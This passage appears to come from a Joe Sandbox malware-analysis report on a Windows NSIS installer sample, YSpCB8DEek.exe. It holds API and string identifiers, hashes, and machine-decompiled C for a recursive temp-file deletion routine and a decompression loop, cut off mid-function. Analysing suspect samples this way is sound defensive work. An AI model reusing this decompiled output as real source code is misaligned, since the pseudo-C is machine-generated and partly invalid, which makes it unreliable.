                            • API ID: Processlstrcat$ExitFile$Directory$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
                            • String ID: "C:\Users\user\Desktop\YSpCB8DEek.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop\YSpCB8DEek.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                            • API String ID: 2292928366-2509484867
                            • Opcode ID: e0a8c6016783217a32738e87f4e0326041da0509f66f4411adb9540052cd23fd
                            • Instruction ID: d56582c8b11bee4b9d4e83ad1f604629a9588d533935b381636b20c84fba3529
                            • Opcode Fuzzy Hash: e0a8c6016783217a32738e87f4e0326041da0509f66f4411adb9540052cd23fd
                            • Instruction Fuzzy Hash: D4E1F471A00214AADB20AFB58D45A6E3EB8EB05709F50847FF945B32D1DB7C8A41CB6D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            C-Code - Quality: 98%
                            			E00405D74(void* __eflags, signed int _a4, signed int _a8) {
                            				signed int _v8;
                            				signed int _v12;
                            				short _v556;
                            				short _v558;
                            				struct _WIN32_FIND_DATAW _v604;
                            				signed int _t38;
                            				signed int _t52;
                            				signed int _t55;
                            				signed int _t62;
                            				void* _t64;
                            				signed char _t65;
                            				WCHAR* _t66;
                            				void* _t67;
                            				WCHAR* _t68;
                            				void* _t70;
                            
                            				_t65 = _a8;
                            				_t68 = _a4;
                            				_v8 = _t65 & 0x00000004;
                            				_t38 = E0040603F(__eflags, _t68);
                            				_v12 = _t38;
                            				if((_t65 & 0x00000008) != 0) {
                            					_t62 = DeleteFileW(_t68); // executed
                            					asm("sbb eax, eax");
                            					_t64 =  ~_t62 + 1;
                            					 *0x42a2e8 =  *0x42a2e8 + _t64;
                            					return _t64;
                            				}
                            				_a4 = _t65;
                            				_t8 =  &_a4;
                            				 *_t8 = _a4 & 0x00000001;
                            				__eflags =  *_t8;
                            				if( *_t8 == 0) {
                            					L5:
                            					E00406668(0x425750, _t68);
                            					__eflags = _a4;
                            					if(_a4 == 0) {
                            						E00405F83(_t68);
                            					} else {
                            						lstrcatW(0x425750, L"\\*.*");
                            					}
                            					__eflags =  *_t68;
                            					if( *_t68 != 0) {
                            						L10:
                            						lstrcatW(_t68, 0x40a014);
                            						L11:
                            						_t66 =  &(_t68[lstrlenW(_t68)]);
                            						_t38 = FindFirstFileW(0x425750,  &_v604); // executed
                            						_t70 = _t38;
                            						__eflags = _t70 - 0xffffffff;
                            						if(_t70 == 0xffffffff) {
                            							L26:
                            							__eflags = _a4;
                            							if(_a4 != 0) {
                            								_t30 = _t66 - 2;
                            								 *_t30 =  *(_t66 - 2) & 0x00000000;
                            								__eflags =  *_t30;
                            							}
                            							goto L28;
                            						} else {
                            							goto L12;
                            						}
                            						do {
                            							L12:
                            							__eflags = _v604.cFileName - 0x2e;
                            							if(_v604.cFileName != 0x2e) {
                            								L16:
                            								E00406668(_t66,  &(_v604.cFileName));
                            								__eflags = _v604.dwFileAttributes & 0x00000010;
                            								if(__eflags == 0) {
                            									_t52 = E00405D2C(__eflags, _t68, _v8);
                            									__eflags = _t52;
                            									if(_t52 != 0) {
                            										E004056CA(0xfffffff2, _t68);
                            									} else {
                            										__eflags = _v8 - _t52;
                            										if(_v8 == _t52) {
                            											 *0x42a2e8 =  *0x42a2e8 + 1;
                            										} else {
                            											E004056CA(0xfffffff1, _t68);
                            											E00406428(_t67, _t68, 0);
                            										}
                            									}
                            								} else {
                            									__eflags = (_a8 & 0x00000003) - 3;
                            									if(__eflags == 0) {
                            										E00405D74(__eflags, _t68, _a8);
                            									}
                            								}
                            								goto L24;
                            							}
                            							__eflags = _v558;
                            							if(_v558 == 0) {
                            								goto L24;
                            							}
                            							__eflags = _v558 - 0x2e;
                            							if(_v558 != 0x2e) {
                            								goto L16;
                            							}
                            							__eflags = _v556;
                            							if(_v556 == 0) {
                            								goto L24;
                            							}
                            							goto L16;
                            							L24:
                            							_t55 = FindNextFileW(_t70,  &_v604); // executed
                            							__eflags = _t55;
                            						} while (_t55 != 0);
                            						_t38 = FindClose(_t70); // executed
                            						goto L26;
                            					}
                            					__eflags =  *0x425750 - 0x5c;
                            					if( *0x425750 != 0x5c) {
                            						goto L11;
                            					}
                            					goto L10;
                            				} else {
                            					__eflags = _t38;
                            					if(_t38 == 0) {
                            						L28:
                            						__eflags = _a4;
                            						if(_a4 == 0) {
                            							L36:
                            							return _t38;
                            						}
                            						__eflags = _v12;
                            						if(_v12 != 0) {
                            							_t38 = E0040699E(_t68);
                            							__eflags = _t38;
                            							if(_t38 == 0) {
                            								goto L36;
                            							}
                            							E00405F37(_t68);
                            							_t38 = E00405D2C(__eflags, _t68, _v8 | 0x00000001);
                            							__eflags = _t38;
                            							if(_t38 != 0) {
                            								return E004056CA(0xffffffe5, _t68);
                            							}
                            							__eflags = _v8;
                            							if(_v8 == 0) {
                            								goto L30;
                            							}
                            							E004056CA(0xfffffff1, _t68);
                            							return E00406428(_t67, _t68, 0);
                            						}
                            						L30:
                            						 *0x42a2e8 =  *0x42a2e8 + 1;
                            						return _t38;
                            					}
                            					__eflags = _t65 & 0x00000002;
                            					if((_t65 & 0x00000002) == 0) {
                            						goto L28;
                            					}
                            					goto L5;
                            				}
                            			}
                            0x00405f09
                            0x00405f0e
                            0x00405f10
                            0x00000000
                            0x00405f2b
                            0x00405f12
                            0x00405f15
                            0x00000000
                            0x00000000
                            0x00405f1a
                            0x00000000
                            0x00405f21
                            0x00405eea
                            0x00405eea
                            0x00000000
                            0x00405eea
                            0x00405dc4
                            0x00405dc7
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00405dc7

                            APIs
                            • DeleteFileW.KERNELBASE(?,?,766DFAA0,766DF560,00000000), ref: 00405D9D
                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsjD2C5.tmp\*.*,\*.*), ref: 00405DE5
                            • lstrcatW.KERNEL32(?,0040A014), ref: 00405E08
                            • lstrlenW.KERNEL32(?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsjD2C5.tmp\*.*,?,?,766DFAA0,766DF560,00000000), ref: 00405E0E
                            • FindFirstFileW.KERNELBASE(C:\Users\user\AppData\Local\Temp\nsjD2C5.tmp\*.*,?,?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsjD2C5.tmp\*.*,?,?,766DFAA0,766DF560,00000000), ref: 00405E1E
                            • FindNextFileW.KERNELBASE(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405EBE
                            • FindClose.KERNELBASE(00000000), ref: 00405ECD
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.322651210.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322670175.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322773729.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                            • String ID: .$.$C:\Users\user\AppData\Local\Temp\nsjD2C5.tmp\*.*$\*.*
                            • API String ID: 2035342205-3765450062
                            • Opcode ID: eb4081a649fdbb44c8907daec76b44e1c805ca5b036c6d0867ef95af4715127c
                            • Instruction ID: 3801e3340fbbb9c460ab277ab089a7ece50ce31247a5b640c745bca9484d7288
                            • Opcode Fuzzy Hash: eb4081a649fdbb44c8907daec76b44e1c805ca5b036c6d0867ef95af4715127c
                            • Instruction Fuzzy Hash: 46410330800A15AADB21AB61CC49BBF7678EF41715F50413FF881711D1DB7C4A82CEAE
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            C-Code - Quality: 98%
                            			E00406D5F() {
                            				unsigned short _t531;
                            				signed int _t532;
                            				void _t533;
                            				void* _t534;
                            				signed int _t535;
                            				signed int _t565;
                            				signed int _t568;
                            				signed int _t590;
                            				signed int* _t607;
                            				void* _t614;
                            
                            				L0:
                            				while(1) {
                            					L0:
                            					if( *(_t614 - 0x40) != 0) {
                            						 *(_t614 - 0x34) = 1;
                            						 *(_t614 - 0x84) = 7;
                            						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
                            						L132:
                            						 *(_t614 - 0x54) = _t607;
                            						L133:
                            						_t531 =  *_t607;
                            						_t590 = _t531 & 0x0000ffff;
                            						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
                            						if( *(_t614 - 0xc) >= _t565) {
                            							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
                            							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
                            							 *(_t614 - 0x40) = 1;
                            							_t532 = _t531 - (_t531 >> 5);
                            							 *_t607 = _t532;
                            						} else {
                            							 *(_t614 - 0x10) = _t565;
                            							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
                            							 *_t607 = (0x800 - _t590 >> 5) + _t531;
                            						}
                            						if( *(_t614 - 0x10) >= 0x1000000) {
                            							L139:
                            							_t533 =  *(_t614 - 0x84);
                            							L140:
                            							 *(_t614 - 0x88) = _t533;
                            							goto L1;
                            						} else {
                            							L137:
                            							if( *(_t614 - 0x6c) == 0) {
                            								 *(_t614 - 0x88) = 5;
                            								goto L170;
                            							}
                            							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
                            							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                            							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                            							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
                            							goto L139;
                            						}
                            					} else {
                            						__eax =  *(__ebp - 0x5c) & 0x000000ff;
                            						__esi =  *(__ebp - 0x60);
                            						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                            						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                            						__ecx =  *(__ebp - 0x3c);
                            						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                            						__ecx =  *(__ebp - 4);
                            						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                            						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                            						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                            						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                            						if( *(__ebp - 0x38) >= 4) {
                            							if( *(__ebp - 0x38) >= 0xa) {
                            								_t97 = __ebp - 0x38;
                            								 *_t97 =  *(__ebp - 0x38) - 6;
                            							} else {
                            								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                            							}
                            						} else {
                            							 *(__ebp - 0x38) = 0;
                            						}
                            						if( *(__ebp - 0x34) == __edx) {
                            							__ebx = 0;
                            							__ebx = 1;
                            							L60:
                            							__eax =  *(__ebp - 0x58);
                            							__edx = __ebx + __ebx;
                            							__ecx =  *(__ebp - 0x10);
                            							__esi = __edx + __eax;
                            							__ecx =  *(__ebp - 0x10) >> 0xb;
                            							__ax =  *__esi;
                            							 *(__ebp - 0x54) = __esi;
                            							__edi = __ax & 0x0000ffff;
                            							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                            							if( *(__ebp - 0xc) >= __ecx) {
                            								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                            								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                            								__cx = __ax;
                            								_t216 = __edx + 1; // 0x1
                            								__ebx = _t216;
                            								__cx = __ax >> 5;
                            								 *__esi = __ax;
                            							} else {
                            								 *(__ebp - 0x10) = __ecx;
                            								0x800 = 0x800 - __edi;
                            								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                            								__ebx = __ebx + __ebx;
                            								 *__esi = __cx;
                            							}
                            							 *(__ebp - 0x44) = __ebx;
                            							if( *(__ebp - 0x10) >= 0x1000000) {
                            								L59:
                            								if(__ebx >= 0x100) {
                            									goto L54;
                            								}
                            								goto L60;
                            							} else {
                            								L57:
                            								if( *(__ebp - 0x6c) == 0) {
                            									 *(__ebp - 0x88) = 0xf;
                            									goto L170;
                            								}
                            								__ecx =  *(__ebp - 0x70);
                            								__eax =  *(__ebp - 0xc);
                            								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                            								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                            								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                            								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                            								_t202 = __ebp - 0x70;
                            								 *_t202 =  *(__ebp - 0x70) + 1;
                            								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                            								goto L59;
                            							}
                            						} else {
                            							__eax =  *(__ebp - 0x14);
                            							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                            							if(__eax >=  *(__ebp - 0x74)) {
                            								__eax = __eax +  *(__ebp - 0x74);
                            							}
                            							__ecx =  *(__ebp - 8);
                            							__ebx = 0;
                            							__ebx = 1;
                            							__al =  *((intOrPtr*)(__eax + __ecx));
                            							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                            							L40:
                            							__eax =  *(__ebp - 0x5b) & 0x000000ff;
                            							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                            							__ecx =  *(__ebp - 0x58);
                            							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                            							 *(__ebp - 0x48) = __eax;
                            							__eax = __eax + 1;
                            							__eax = __eax << 8;
                            							__eax = __eax + __ebx;
                            							__esi =  *(__ebp - 0x58) + __eax * 2;
                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                            							__ax =  *__esi;
                            							 *(__ebp - 0x54) = __esi;
                            							__edx = __ax & 0x0000ffff;
                            							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                            							if( *(__ebp - 0xc) >= __ecx) {
                            								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                            								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                            								__cx = __ax;
                            								 *(__ebp - 0x40) = 1;
                            								__cx = __ax >> 5;
                            								__ebx = __ebx + __ebx + 1;
                            								 *__esi = __ax;
                            							} else {
                            								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                            								 *(__ebp - 0x10) = __ecx;
                            								0x800 = 0x800 - __edx;
                            								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                            								__ebx = __ebx + __ebx;
                            								 *__esi = __cx;
                            							}
                            							 *(__ebp - 0x44) = __ebx;
                            							if( *(__ebp - 0x10) >= 0x1000000) {
                            								L38:
                            								__eax =  *(__ebp - 0x40);
                            								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                            									while(1) {
                            										if(__ebx >= 0x100) {
                            											break;
                            										}
                            										__eax =  *(__ebp - 0x58);
                            										__edx = __ebx + __ebx;
                            										__ecx =  *(__ebp - 0x10);
                            										__esi = __edx + __eax;
                            										__ecx =  *(__ebp - 0x10) >> 0xb;
                            										__ax =  *__esi;
                            										 *(__ebp - 0x54) = __esi;
                            										__edi = __ax & 0x0000ffff;
                            										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                            										if( *(__ebp - 0xc) >= __ecx) {
                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                            											__cx = __ax;
                            											_t169 = __edx + 1; // 0x1
                            											__ebx = _t169;
                            											__cx = __ax >> 5;
                            											 *__esi = __ax;
                            										} else {
                            											 *(__ebp - 0x10) = __ecx;
                            											0x800 = 0x800 - __edi;
                            											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                            											__ebx = __ebx + __ebx;
                            											 *__esi = __cx;
                            										}
                            										 *(__ebp - 0x44) = __ebx;
                            										if( *(__ebp - 0x10) < 0x1000000) {
                            											L45:
                            											if( *(__ebp - 0x6c) == 0) {
                            												 *(__ebp - 0x88) = 0xe;
                            												goto L170;
                            											}
                            											__ecx =  *(__ebp - 0x70);
                            											__eax =  *(__ebp - 0xc);
                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                            											_t155 = __ebp - 0x70;
                            											 *_t155 =  *(__ebp - 0x70) + 1;
                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                            										}
                            									}
                            									L53:
                            									_t172 = __ebp - 0x34;
                            									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
                            									L54:
                            									__al =  *(__ebp - 0x44);
                            									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                            									L55:
                            									if( *(__ebp - 0x64) == 0) {
                            										 *(__ebp - 0x88) = 0x1a;
                            										goto L170;
                            									}
                            									__ecx =  *(__ebp - 0x68);
                            									__al =  *(__ebp - 0x5c);
                            									__edx =  *(__ebp - 8);
                            									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                            									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                            									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                            									 *( *(__ebp - 0x68)) = __al;
                            									__ecx =  *(__ebp - 0x14);
                            									 *(__ecx +  *(__ebp - 8)) = __al;
                            									__eax = __ecx + 1;
                            									__edx = 0;
                            									_t191 = __eax %  *(__ebp - 0x74);
                            									__eax = __eax /  *(__ebp - 0x74);
                            									__edx = _t191;
                            									L79:
                            									 *(__ebp - 0x14) = __edx;
                            									L80:
                            									 *(__ebp - 0x88) = 2;
                            									goto L1;
                            								}
                            								if(__ebx >= 0x100) {
                            									goto L53;
                            								}
                            								goto L40;
                            							} else {
                            								L36:
                            								if( *(__ebp - 0x6c) == 0) {
                            									 *(__ebp - 0x88) = 0xd;
                            									L170:
                            									_t568 = 0x22;
                            									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
                            									_t535 = 0;
                            									L172:
                            									return _t535;
                            								}
                            								__ecx =  *(__ebp - 0x70);
                            								__eax =  *(__ebp - 0xc);
                            								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                            								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                            								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                            								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                            								_t121 = __ebp - 0x70;
                            								 *_t121 =  *(__ebp - 0x70) + 1;
                            								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                            								goto L38;
                            							}
                            						}
                            					}
                            					L1:
                            					_t534 =  *(_t614 - 0x88);
                            					if(_t534 > 0x1c) {
                            						L171:
                            						_t535 = _t534 | 0xffffffff;
                            						goto L172;
                            					}
                            					switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
                            						case 0:
                            							if( *(_t614 - 0x6c) == 0) {
                            								goto L170;
                            							}
                            							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                            							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                            							_t534 =  *( *(_t614 - 0x70));
                            							if(_t534 > 0xe1) {
                            								goto L171;
                            							}
                            							_t538 = _t534 & 0x000000ff;
                            							_push(0x2d);
                            							asm("cdq");
                            							_pop(_t570);
                            							_push(9);
                            							_pop(_t571);
                            							_t610 = _t538 / _t570;
                            							_t540 = _t538 % _t570 & 0x000000ff;
                            							asm("cdq");
                            							_t605 = _t540 % _t571 & 0x000000ff;
                            							 *(_t614 - 0x3c) = _t605;
                            							 *(_t614 - 0x1c) = (1 << _t610) - 1;
                            							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
                            							_t613 = (0x300 << _t605 + _t610) + 0x736;
                            							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
                            								L10:
                            								if(_t613 == 0) {
                            									L12:
                            									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
                            									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
                            									goto L15;
                            								} else {
                            									goto L11;
                            								}
                            								do {
                            									L11:
                            									_t613 = _t613 - 1;
                            									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
                            								} while (_t613 != 0);
                            								goto L12;
                            							}
                            							if( *(_t614 - 4) != 0) {
                            								GlobalFree( *(_t614 - 4));
                            							}
                            							_t534 = GlobalAlloc(0x40, 0x600); // executed
                            							 *(_t614 - 4) = _t534;
                            							if(_t534 == 0) {
                            								goto L171;
                            							} else {
                            								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
                            								goto L10;
                            							}
                            						case 1:
                            							L13:
                            							__eflags =  *(_t614 - 0x6c);
                            							if( *(_t614 - 0x6c) == 0) {
                            								 *(_t614 - 0x88) = 1;
                            								goto L170;
                            							}
                            							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                            							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
                            							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                            							_t45 = _t614 - 0x48;
                            							 *_t45 =  *(_t614 - 0x48) + 1;
                            							__eflags =  *_t45;
                            							L15:
                            							if( *(_t614 - 0x48) < 4) {
                            								goto L13;
                            							}
                            							_t546 =  *(_t614 - 0x40);
                            							if(_t546 ==  *(_t614 - 0x74)) {
                            								L20:
                            								 *(_t614 - 0x48) = 5;
                            								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
                            								goto L23;
                            							}
                            							 *(_t614 - 0x74) = _t546;
                            							if( *(_t614 - 8) != 0) {
                            								GlobalFree( *(_t614 - 8));
                            							}
                            							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
                            							 *(_t614 - 8) = _t534;
                            							if(_t534 == 0) {
                            								goto L171;
                            							} else {
                            								goto L20;
                            							}
                            						case 2:
                            							L24:
                            							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
                            							 *(_t614 - 0x84) = 6;
                            							 *(_t614 - 0x4c) = _t553;
                            							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
                            							goto L132;
                            						case 3:
                            							L21:
                            							__eflags =  *(_t614 - 0x6c);
                            							if( *(_t614 - 0x6c) == 0) {
                            								 *(_t614 - 0x88) = 3;
                            								goto L170;
                            							}
                            							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                            							_t67 = _t614 - 0x70;
                            							 *_t67 =  &(( *(_t614 - 0x70))[1]);
                            							__eflags =  *_t67;
                            							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
                            							L23:
                            							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
                            							if( *(_t614 - 0x48) != 0) {
                            								goto L21;
                            							}
                            							goto L24;
                            						case 4:
                            							goto L133;
                            						case 5:
                            							goto L137;
                            						case 6:
                            							goto L0;
                            						case 7:
                            							__eflags =  *(__ebp - 0x40) - 1;
                            							if( *(__ebp - 0x40) != 1) {
                            								__eax =  *(__ebp - 0x24);
                            								 *(__ebp - 0x80) = 0x16;
                            								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                            								__eax =  *(__ebp - 0x28);
                            								 *(__ebp - 0x24) =  *(__ebp - 0x28);
                            								__eax =  *(__ebp - 0x2c);
                            								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                            								__eax = 0;
                            								__eflags =  *(__ebp - 0x38) - 7;
                            								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                            								__al = __al & 0x000000fd;
                            								__eax = (__eflags >= 0) - 1 + 0xa;
                            								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                            								__eax =  *(__ebp - 4);
                            								__eax =  *(__ebp - 4) + 0x664;
                            								__eflags = __eax;
                            								 *(__ebp - 0x58) = __eax;
                            								goto L68;
                            							}
                            							__eax =  *(__ebp - 4);
                            							__ecx =  *(__ebp - 0x38);
                            							 *(__ebp - 0x84) = 8;
                            							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                            							goto L132;
                            						case 8:
                            							__eflags =  *(__ebp - 0x40);
                            							if( *(__ebp - 0x40) != 0) {
                            								__eax =  *(__ebp - 4);
                            								__ecx =  *(__ebp - 0x38);
                            								 *(__ebp - 0x84) = 0xa;
                            								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                            							} else {
                            								__eax =  *(__ebp - 0x38);
                            								__ecx =  *(__ebp - 4);
                            								__eax =  *(__ebp - 0x38) + 0xf;
                            								 *(__ebp - 0x84) = 9;
                            								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                            								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                            							}
                            							goto L132;
                            						case 9:
                            							__eflags =  *(__ebp - 0x40);
                            							if( *(__ebp - 0x40) != 0) {
                            								goto L89;
                            							}
                            							__eflags =  *(__ebp - 0x60);
                            							if( *(__ebp - 0x60) == 0) {
                            								goto L171;
                            							}
                            							__eax = 0;
                            							__eflags =  *(__ebp - 0x38) - 7;
                            							_t258 =  *(__ebp - 0x38) - 7 >= 0;
                            							__eflags = _t258;
                            							0 | _t258 = _t258 + _t258 + 9;
                            							 *(__ebp - 0x38) = _t258 + _t258 + 9;
                            							goto L75;
                            						case 0xa:
                            							__eflags =  *(__ebp - 0x40);
                            							if( *(__ebp - 0x40) != 0) {
                            								__eax =  *(__ebp - 4);
                            								__ecx =  *(__ebp - 0x38);
                            								 *(__ebp - 0x84) = 0xb;
                            								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                            								goto L132;
                            							}
                            							__eax =  *(__ebp - 0x28);
                            							goto L88;
                            						case 0xb:
                            							__eflags =  *(__ebp - 0x40);
                            							if( *(__ebp - 0x40) != 0) {
                            								__ecx =  *(__ebp - 0x24);
                            								__eax =  *(__ebp - 0x20);
                            								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                            							} else {
                            								__eax =  *(__ebp - 0x24);
                            							}
                            							__ecx =  *(__ebp - 0x28);
                            							 *(__ebp - 0x24) =  *(__ebp - 0x28);
                            							L88:
                            							__ecx =  *(__ebp - 0x2c);
                            							 *(__ebp - 0x2c) = __eax;
                            							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                            							L89:
                            							__eax =  *(__ebp - 4);
                            							 *(__ebp - 0x80) = 0x15;
                            							__eax =  *(__ebp - 4) + 0xa68;
                            							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                            							goto L68;
                            						case 0xc:
                            							L99:
                            							__eflags =  *(__ebp - 0x6c);
                            							if( *(__ebp - 0x6c) == 0) {
